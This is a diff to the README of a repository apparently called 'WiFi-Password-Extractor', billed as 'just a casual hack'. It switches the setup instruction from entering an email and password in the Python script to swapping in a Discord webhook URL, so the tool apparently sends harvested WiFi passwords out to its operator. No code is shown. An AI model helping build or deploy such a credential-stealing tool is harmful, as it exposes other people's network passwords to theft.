Pranavoro/WiFi-Password-Extractor/ReadMe.md

 # Just a casual hack.

-To configure it to your email, enter the email and password in the python script file.
+To configure it to your your discord server, simply replace the webhook url and you're good to go